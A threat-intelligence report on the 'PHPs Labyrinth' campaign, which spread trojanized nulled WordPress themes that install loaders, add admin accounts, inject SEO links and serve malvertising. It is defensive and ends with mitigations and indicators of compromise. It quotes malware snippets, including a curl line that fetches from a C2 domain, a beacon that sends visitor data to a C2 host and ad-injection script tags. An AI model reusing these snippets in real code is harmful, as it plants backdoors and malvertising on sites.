Overview
Prevailion’s Tailored Intelligence team has
followed an active supply chain attack that has been ongoing since late 2017,
we named this campaign “PHPs Labyrinth.” In this operation, threat actors have
been able to surreptitiously install malicious files into a large number of
Premium WordPress Themes and Plugins. We assess that the responsible party
chose to target WordPress as it makes up 60% of all Content Management systems, and 34%
of all websites on the internet. WordPress themes and plugins allow the average
person to quickly and easily create a website through “drag and drop” features,
rather than coding an entire website themselves.
The nefarious actor took advantage of an
increased demand for premium themes, and managed to distribute them to various
end-users through the use of specific WordPress marketplace platforms. These
marketplace platforms were created by the threat actor; we were able to
discover 30 different platforms used to distribute the trojanized themes and
plugins. Three of the most popular webpages on these platforms were;
● “Ultimate Support Chat” with
approximately 700k views
●
“Woocomerence Product filter” with
approximately 175k views and
●
“Slider Revolution v5.4.8.1” with
approximately 125k views.
Thus far Prevailion has been able to identify
over 20k actively compromised web servers worldwide, that are displaying evidence of compromise. This data is currently
available on the Prevailion
Apex platform. Based upon the number of views from the malicious
platforms, we speculate that the total number of infected webservers is likely
much higher, potentially in the hundreds of thousands. Due to the pandemic
nature of this threat, Prevailion coordinated their efforts with appropriate
U.S law enforcement on this campaign.
The attack commences when an unsuspecting
victim uploads a trojanized theme to their web server. References to those
trojanized files date back to stack overflow posts from October 2017. Once
all the malicious files are downloaded, the threat actor gained full control
over the web server - allowing them to add an administrative account, recover
the web admin’s email account and WordPress password hash. If the password was
recovered, from the hash and was used for multiple accounts, it could allow
access to corporate resources.
In most cases we assess that the web servers
ultimately became part of the Propeller Ads advertising network. Additional
research shows that the Propeller Ads network has been associated with a
plethora of malicious activity from different threat actors, including but not
limited to malvertising and the Fallout exploit kit. This ad network is
manipulated by attackers to become the contagion vector, allowing threat actors
to remotely post malicious ads on otherwise benign websites. The malicious ads
run javascript files, and surreptitiously install malware on victimized
machines. If successful, this technique could allow the threat actor to steal
usernames, passwords, and private files from victims' computers.
WordPress Malware
PHP’s
Labyrinth Campaign Walk Through
Infection source
The Prevailion team has been able to identify
30 platforms that served trojanized WordPress Themes. The most prominent
websites appeared to be called Vestathemes.com. The website description states
that they offer “Thousands of free nulled, [a.k.a. pirated] WordPress Themes
and Plugins.” When analyzing this cluster of WordPress platforms we observed a
number of irregularities that make us believe they were fictitious, and managed
by the same entity. For instance, sites had broken links to social media icons
that took the visitor right back to the homepage, furthermore all the
suspicious websites appeared to use the same template.
Screenshot of Vestatheme.com and null5.top website
To supplement this claim; in at least one
instance the threat actor created domain, null24[.]icu, displayed the page
header saying, Nulledzip[.]download, which is one of the other websites. That
domain, nulledzip[.]download, was also flagged in a Digital Millennium
Copyright Act takedown notice that can be found here.
Based off our analysis we have identified the
following 30 websites that correlate to this cluster;
●
Null5[.]top,
●
Freedownload[.]network,
●
Downloadfreethemes[.]io,
●
Themesfreedownload[.]net,
●
Downloadfreethemes[.]co,
●
Downloadfreethemes[.]pw,
●
Wpfreedownload[.]press,
●
Freenulled[.]top,
●
Nulledzip[.]download,
●
Download-freethemes[.]download,
●
Wpmania[.]download,
●
Themesdad[.]com,
●
Downloadfreethemes[.]download,
●
Downloadfreethemes[.]space,
●
Download-freethemes[.]download,
●
Themesfreedownload[.]top,
●
Wpmania[.]download,
●
Premiumfreethemes[.]top,
●
Downloadfreethemes[.]space,
●
Downloadfreethemes[.]cc,
●
Freethemes[.]space,
●
Premiumfreethemes[.]top,
●
Downloadfreenulled[.]download,
●
Downloadfreethemes[.]download,
●
Freethemes[.]space,
●
Dlword[.]press,
●
Downloadnulled[.]pw,
●
24x7themes[.]top,
●
null24[.]icu
Loader
The “class.theme-module.php” or
“class.plugin-modules.php” file is the operative file that was added to the all
the trojanized themes. The threat actor added functionality that allows for the
command and control node to be changed to a “newdomain” periodically. The next
function obtains a “$wp_auth_key” from one of the 1st stage C2s. Afterward it
then writes the contents of the 1st stage C2 with the URL of code.php to a file
called “wp-tmp.php”. The malware would perform host based reconnaissance and
attempts to enumerate the following directories:
upload
|
cli
|
media
|
template
|
uploads
|
components
|
modules
|
Images
|
img
|
includes
|
plugins
|
Css
|
administrator
|
language
|
tmp
|
js
|
admin
|
layouts
|
upgrade
|
image
|
Bin
|
libraries
|
engine
|
file
|
cache
|
logs
|
templates
|
files
|
wp-admin
|
wp-content
|
wp-includes
|
Next it checks to see if certain files exist;
such as post.php, wp-vcd.php, if not it creates them on the system. It then
copies the “WP_CD_Code” function to “wp-vcd.php”. This is the file that seems
to have drawn the most attention over the past few years, and has been
mentioned on WordPress web forums. The wp-vcd.php file copied the
malicious code from the file “class.theme-modules.php” that was previously
discussed.
Then it scans for a file named functions, if
that file exists it will run “file get contents” on the 1st stage C2,
HTTP_HOST, Password and Install hash.
One such command GET request would look like
this
http://www.trilns.com/o.php?host=www.compromiseddomain.com&password={MD5hash}
Previously employed code will then repeat the
process and iterate over two other domains with different generic Top-Level
domains (gTLDs). We suspect that these domains serve as backup communications
channels in case an issue arose with the primary domain. An example of the
three URLs used in the December campaign were:
●
hxxp://www.vrilns[.]com/code[.]php
●
hxxp://www.vrilns[.]pw/code[.]php
●
hxxp://www.vrilns[.]top/code[.]php
Once the code creates the new wp-vcd.php file,
it then deletes the file class.theme-module.php.
In this section we’ll examine the three files
that were previously made by the loader script. Note that some of the files
will be discussed throughout the report, in this section we show the files as
they appear after the loader module was run once.
Newly Observed Shift in Tactics
We observed the threat actor altering their
tactics, techniques and procedures (TTPs), starting in late December 2019 after
a report detailing aspects of this activity was reported by another security firm. The most
recent threat actor domain registered was frilns[.]com which used Alidns, Alibaba Cloud DNS,
instead of CloudFare. The threat actor also no longer
relied upon CloudFare hosting services and seemingly moved all the domains to a
single IP address 94[.]156[.]175[.]170. One more change is that the threat
actor removed the secondary and tertiary communications channels during the
December to January 2020 timeframe.
1st Stage
At this point we see the threat actor taking
action from their 1st stage server, adding code to the existing files on the
compromised machine. One modified file was functions.php, the threat actor
added a line of code to top of this file that would run the wp-vcd.php file.
The next file modified was wp-tmp.php, as mentioned above this file contains an
WP_AUTH_Key. It was here that we took
note of two additional sections of code.
The first section downloads additional code
and adds it to the top of functions.php from a 1st stage C2. An example of
this:
$file=file_get_contents(get_template_directory().'/functions.php');
$filec=file_get_contents(get_stylesheet_directory().'/functions.php');
$rep="pacocs.top"; $repw="pacocs.xyz"; if
(stripos($file,$rep) !== false) { $new_file=str_replace($rep,$repw,$file);
@file_put_contents(get_template_directory().'/functions.php',$new_file); } if
(stripos($filec,$rep) !== false) { $new_filec=str_replace($rep,$repw,$filec);
The second section of code adds a persistent
cookie called “wordpress_cf_adm_use_adm” to anyone who visits the website -
however the cookie would only be added to users who came to the website from
one of the following search engines:
●
Google,
●
Yahoo,
●
Yandex,
●
MSN,
●
Baidu,
●
Bing
●
DoubleClick.
The cookie includes the referring search
engine, as well as a reference to the compromised domain that was visited, and
is set to persist for 1000 days. Once the cookie was attached to the end-user,
their IP address is added to a list that lives in the file called
“wp-feed.php.” The code used by the threat actor appears to slightly modify
code that was found on another WordPress forum, that talked about how to
target visitors of your site from search engines.
New
Administrative Account
In order to ensure continued access to the
infected websites, they also added an administrative account. This account
allows them to simply log back into the website (with administrative
privileges) at any time to alter any files. There was one variant of this
malware reported by Astra, where the threat actor would create the
username “wpadmin”. More recent reporting from Medium indicated that the threat actor kept
this feature but switched to utilizing a
different username of “100010010”.
2nd Stage
Functions.php
We came back to the functions.php file to
analyze the new code added during the last step. The new segment of code sets
the max upload and post size to 128 Megabytes. It also specified that if the
code took longer than 600 seconds to execute, it should stop. We hypothesize
that these features were added to ensure their activity was not detected, as a
hung process would be more likely to cause problems and be investigated by a
responder.
@ini_set( 'upload_max_size' , '128M'
);
@ini_set( 'post_max_size', '128M');
@ini_set( 'max_execution_time', '600' );
Next
it will obtain the IP address, bot number, pack and user-agent string of the
compromised machine and send them to a threat actor controlled C2.
$result=get_url(implode("",$hoho)."/logs/dolodos.php?url=".urlencode("http://".$server_host.$_SERVER["REQUEST_URI"])."&ref=".urlencode(@$_SERVER["HTTP_REFERER"])."&ip=".checked_ip()."&bot=$bot_num&pck=$pck&uagent=".urlencode($_SERVER["HTTP_USER_AGENT"]));
hxxp://dolodos[.]top
system("chmod 755 $red_domain_path;curl -s
http://piasuna[.]gdn/gen/actual_domain_my.php?pck=$pck | base64 >
$red_domain_path");
After
identifying the URL pattern we were able to find another live C2 domain through
Google, vosmas[.]icu/gen/actual_domain_my.php?pck=ip8.
Google
Search for the URL path found in the deobfuscated functions.php file
Through
our efforts we were able to identify the following domains:
●
vosmas[.]icu
●
tdreg[.]icu
●
tdreg[.]top
●
medsource[.]top
●
tretas[.]top
●
piastas[.]gdn
●
pervas[.]top
●
vtoras[.]top
●
dolodos[.]top
●
piasuna[.]gdn
●
semasa[.]icu
●
vosmas[.]icu
●
devata[.]icu
One
notable aspect - some of these domains such as medsource[.]top simply contain
instructions that redirect the output to tdreg[.]icu. So we suspect that some
of the domains may act as relays for the tdreg[.]icu domain
Google Cache showing the domain medsource[.]top redirecting to tdreg[.]icu
Wp-tmp.php - Search Engine Optimization (SEO)
component
This
group calculated all the angles when it came to manipulating searches - another
calculated effort was to raise the Search Engine Optimization (SEO) profile of
the sites they controlled, creating a cost-effective means to draw more
“clicks” and use that as a cost effect leverage to proliferate. To accomplish
this, they run a series of commands on the compromised websites in order to
enumerate the individual site. This included three functions for commands:
●
case 'get_all_links'
●
‘set_id_links'
●
case 'create_page'
The
first command obtains a list of the posts on a compromised wordpress site. The
second command allows the attacker to add web links to existing web pages. The
third command enables them to create new web pages on the compromised domain.
In one file, the threat actor added links to
one of the newly-controlled market places, offering their premium nulled
themes. This was likely done to raise the SEO of these websites, ensuring they
get more downloads and ultimately, more infections.
The
functionality in this section appeared to closely mirror code found on another
stack-overflow post, where the incident responder
claimed to find the snippet saved in the file “post.php.” This is where the
attackers can also add “keywords” to make the website more popular, likely in
an attempt to raise the websites profile so it could display more ads. As noted
by other researchers, in previous reporting this aspect of the campaign utilized the
domain *.spekt[.]pw. The advertising component will be explained in the section
below.
Ad-Blocker Script
In
more recent versions of wp-tmp.php, there was a PHP script that would serve as
an Anti- AdBlocker and was used through at least September 2019. This allows
the website to display ads on the visited webpage, even if the end-user was
using a program such as “Ad-Blocker”. Based upon lexicon analysis of
the code found in the sample, the script appeared to be a slightly modified
version of PHP code found on this web forum post from 2017.
Remote Javascript Function - Advertising network
After
the Ad-Blocker code, there is a line for a function called “slider_option” used
to make asynchronous requests to two JavaScript files hosted on remote servers.
These hostnames correspond to the advertising service Propeller Ads. Propellers
Ads is an online ad service where various end users can bid to have their ads
displayed on an otherwise begin website. While this has become a standard
marketing technique, unfortunately it can also be abused by threat actors with
more nefarious intentions. In order to ensure the correct person receives the
advertisement revenue for displaying the ads, the accounts are identified by
their zoneid.
A
copy of the javascript used to invoke the ads is displayed below:
<script async="async"
type="text/javascript"
src="//go.mobisla[.]com/notice.php?p=1558098&interactive=1&pushup=1"></script>
<script
src="//defpush[.]com/ntfc.php?p=1565632" data-cfasync="false"
async></script>';
Propeller Ad Network
Generating Money through Advertisements
Once the WordPress website was compromised,
the threat actor appeared to be interested in generating revenue through the
Propeller Ads network. While the propeller ad network presents itself like any
other ad network, they have had a history of being used by criminal
organizations for malicious purposes. Their extensive run history with various
computer security firms resulted in an article being written about these activities
by TechTarget in 2017.
Malvertising
Malvertising is when threat actors are able to
display malicious ads, and run remote javascript files on otherwise benign
websites. Cisco wrote a comprehensive report on advertising and malvertising last year that
explains the marketing aspects of how paid advertising works. For those that
are unfamiliar the client could chose a plan and would pay:
●
Every time the advertisement is
shown (pay per impression)
●
Every time the advertisement is
clicked (pay per click)
●
Every time the advertisement is
shown, clicked, and something is ordered from the website (pay per order)
During the course of our investigation we
visited a compromised domain and got the following URL. We have removed the
domain and cep string from the URL to avoid identifying the victim.
https://{compromised-Domain}/testomaster-br.php?cep={string}&widget_id=5633835s733669&teaser_id=2497610&click_id=49d0d459e09b42d26f378dea3140b06f&category_id=145&campaign_id=480469&click_price=0.005
From this example, we determined that the
threat actor was receiving half a cent every time someone would click on the
advertisement. In numerous cases, the advertisements were completely benign and
would direct the end user to a legitimate service or website. In other cases
however, we observed pop-up ads prompting the user to download potentially
unwanted programs (PUP) or sometimes called Adware. These redirections could
occur from a user clicking on a box to “allow notifications” or in some cases
just clicking URLs embedded within the website. In one instance, we clicked on
the “about us” link and received a pop up like the one below.
“Flash Player Update” Malvertising for Windows 10
machines from uniqueapps[.]app
In other cases the advertisements don't look
like advertisements at all, and mimic “Software Updates”.
“Software Update” Malvertising for OSX machines from
tharbadir[.]com
If an end user clicks on the pop-up
advertisement, it could install the potentially unwanted program on their local
machine. Once on the local machine, these programs can continue to redirect the
victim’s web browser to certain websites or even download additional malware
from the internet.
Fallout
Exploit Kit
The Nao Security’s twitter account,
stated that they observed propeller ads redirect victims to domains associated
with the Fallout Exploit Kit.
Image was
created by Nao’s Security and posted on twitter - showing propellerads.php
redirecting to an exploit kit
In addition to the screenshot above, other
security firms such as FireEye have previously noted the Fallout Exploit Kit being
propagated to victims through advertising networks. They noted that the victim
would likely be served either a malvertising pop up, similar to those in the
previous section, or connected to the exploit kit based upon the browser
profile from the user-agent string and potentially the location of the victim.
If the browser was successfully exploited by the kit, Viriback noted that it appeared to drop a
variant of Zloader. The zloader agent has historically been
used to further
download additional payloads.
Compromise Intelligence Details
Once Prevailion was able to identify the
command and control nodes associated with this particular campaign, we
collected the associated telemetry information. We then cleaned the data using
proprietary algorithms, thereby reducing bias and the rate of false positives.
This refined data is called Evidence of Compromise (EoC), which allows us to
create a global contagion snapshot representing a portion of impacted
organizations. The map below denotes organizations that
present EoC associated with PHP’s Labyrinth compromised web servers.
Prevailion
Global Contagion Snapshot of EoC.
Based upon our telemetry, affected
organizations are spread across a multitude of countries and sectors. As is
typical with supply chain attacks, there was no clear targeting of any one
individual sector, and so the resulting contagion map shows victimology that
reflects largely upon the popularity of WordPress. Based upon our findings, we
identified that small to medium sized businesses accounted for more than a
fifth of all compromised entities, as they are the primary customers of premium
third-party themes. This is most likely due to the fact that many lack the
necessary funding or human capital to build a completely custom website, unlike
larger, more established firms.
Additionally, we identified a number of more
prominent victims, including but not limited to:
●
A decentralized crypto-mining
website
●
A U.S. based stock trading firm
●
A small U.S. based bank
●
A government run petro/chemical
organization
●
A U.S. based insurance company
●
A large U.S. based manufacturer
●
A U.S. payment card solution
organization
●
A U.S. based IT services
organization
While compromises of smaller third parties may
first appear a nuisance, these instances can actually become quite dangerous
later on down the road. Larger organizations typically have more money to
invest in their cyber defense programs, so it becomes much easier to launch a campaign through a supply chain vendor, than
it would be to directly attempt to infect a larger corporation. If left
undetected, threat actors can use these initial infections to pivot, and affect
larger organizations through their smaller, less defended third parties.
Mitigations
In order to protect against the WordPress
malware, we recommend against using any pirated, a.k.a nulled, software.
Organizations should instead utilizes either open-source software or pay for
premium themes. If your organization’s web server is running windows based
operating systems, we recommend enabling and updating Windows Defender.
The default WordPress passwords are stored in
their current state as a hybrid of MD5 hashes and PHP Pass, which are proven
vulnerable to collision attacks. Through recovery of the
username and MD5 hash, an attacker could find a collision offline to facilitate
access to the organization's corporate network. This emphasizes the problem of
password reuse, which has plagued the industry. When configuring any WordPress
website, we encourage web administrators to use more secure hashing algorithms,
and to never reuse passwords across multiple accounts.
In order to curtail this threat posed to end-users
from people visiting these compromised websites, we recommend using a plugin
like NoScript that prevents remote javascript from running on your machine. We
also recommend updating to the latest operating systems and web browser. This
could help protect against certain exploit kits, which are known to target
outdated web browsers. If you click on a malvertising ad, we recommend scanning
your computer with an up-to-date version of antivirus to minimize the impact of
the threat.
Conclusion
While the problem of compromised websites is
not new, it will continue to plague end users, administrators, and the internet
as a whole. As WordPress becomes even more prominent, it is an evermore
appealing target for attackers. To make matters worse, all end-users need to do
is download one malicious theme or even one plugin to compromise the integrity
of the entire web server. In one instance we have observed a verified
Themeforest purchaser ask questions on support forums about the
malicious files and even included references to one of the command and control
domains. We then downloaded that same theme but did not see any malicious files
and suspect the end user likely downloaded an plugin from a malicious platform
in conjugation with the themeforest theme.
At this time, the threat actor seems content
with generating revenue off the advertising aspect of this campaign; however we
cannot ignore the fact that in its present state, it has metastasized into a
massive botnet, with all the potential issues that represents. This could also
have far reaching impact as it gives other criminals a platform to perform
malvertising and use various exploit kits to amplify their reach. We
assess that exposing and countering this activity we are able impact, this
activity and, other criminals we use these compromised sites as a platform to
exploit various end-users having a ripple effect making everyone safer.
We believe that this campaign was able to
occur for so long due to the placement of these web servers. Similar to the VPNFitler malware, these web servers are
typically located outside of the companies standard perimeter. Many of these
web servers are running without anti-virus software and are rarely checked
except for when they go offline. This unique combination makes them an ideal
target for attackers and we expect to see continued target of Web server and
WordPress related software to remain a serious threat to network defenders.
Indicators of Compromise
1st stage domains
frilns[.]com
crilns[.]com
brilns[.]com
trilns[.]com
frilns[.]com
crilns[.]com
brilns[.]com
trilns[.]com
1st stage IP address
94.156.175[.]170
2nd stage domains
vosmas[.]icu
tdreg[.]icu
tdreg[.]top
medsource[.]top
tretas[.]top
piastas[.]gdn
pervas[.]top
vtoras[.]top
dolodos[.]top
piasuna[.]gdn
semasa[.]icu
vosmas[.]icu
devata[.]icu
vosmas[.]icu
tdreg[.]icu
tdreg[.]top
medsource[.]top
tretas[.]top
piastas[.]gdn
pervas[.]top
vtoras[.]top
dolodos[.]top
piasuna[.]gdn
semasa[.]icu
vosmas[.]icu
devata[.]icu
FileName:class.theme-modules.php
590543e78b9526c6003ea09559983fb8b6788bf729a7ef699a8528df1ee515fc
bb4a9352f5ec15a2fef209fd30502f3f563348d245ee3e53b1defeddc61bd176
a3b97f264d1bdabc21eb7ee504f16f7afe563a83b0f0dbcaefb1fb45d7962867
A1606a7033b77185d40444ccb6571fb9c792235f69872e1d3f6c0556b84849a4
4bf619c5931a70946bad5f4f7e9954eef8820053f4e97feccb1a009ac57fde2c
C7d60c6a28cac56b9dd2661e943da5f623d1e9da6e6f5a3cffbc7a1edb4a025f
70de1fa188414ebcf442ccdefc6873b18cb9f7e801f4af763ca057a03cd92ace
1st stage samples
C61f828482ca269cb76decc9b53db277057caae66b426c3b2b2473d5367c0185
dc0aafc523e5942ec8e9c6f7db172551d4836d8002747b3d9790170d01d6ffa2
385689df54ebbec8715e556d8ab1aecc8a820a32e61d7857618f12ddf5017d77
93bde6244fe499b4eb8cde8c4d79cdd3f0d151f0945ea484f2f18334346776c1
Dc0aafc523e5942ec8e9c6f7db172551d4836d8002747b3d9790170d01d6ffa2
2nd
stage samples:
1eb6a47fe5e37f4ca97721ea22a0462f9b9c789af9b861ba3b0c829823101496
Dc82c31bb81040cd4202ec0d332acfb498d5d5fbc8a62ceb1585a686278852a0
62b0e263d65c837f0b36681f342d75328cb86b5b6de91116f47b5a402da4cb23
385689df54ebbec8715e556d8ab1aecc8a820a32e61d7857618f12ddf5017d77
26a3f5e50ebbcbcee43b9cf5679717a2227dcb046d666f709a4884923f6d2582
06fa326bab5330a7484a75f1af019960b1ab354fb6d7c2e8d3d0d7f4193f2f62
0506bc097ab7151caa9b2768b7c21847610c9e1d86aa656e79836b90c42f62f3
Dc82c31bb81040cd4202ec0d332acfb498d5d5fbc8a62ceb1585a686278852a0
7addff39d07857ffd2fee0779959ea3419408407ced75989a9f1e3c67dbe537a
Malvertising
17a74e5611aeb79f8443a985edbd9f44319af063cc8eda8297f207127ae706b8
fab349488ea7d99a24f7bc97f9e216b4e04e3d257cc02f25ad5b2f6629605321
6a88fb15e191eb7dd0f5efd5313c69cd8271658787bc94e618cbf9542d47686d
Zloader
712503faf40a5e21efd4f2c718674c14a83eca0d6ebe41f985a16a9218111a9f
eafbd21a0f9f082fa2e94e010569d7fa8512d978087c2633d652b865b922465a
Domains
Associated with Zloader
kdsidsiadsakfsas[.]com/gate[.]php
oajdasnndkdahm[.]com/gate[.]php
No comments:
Post a Comment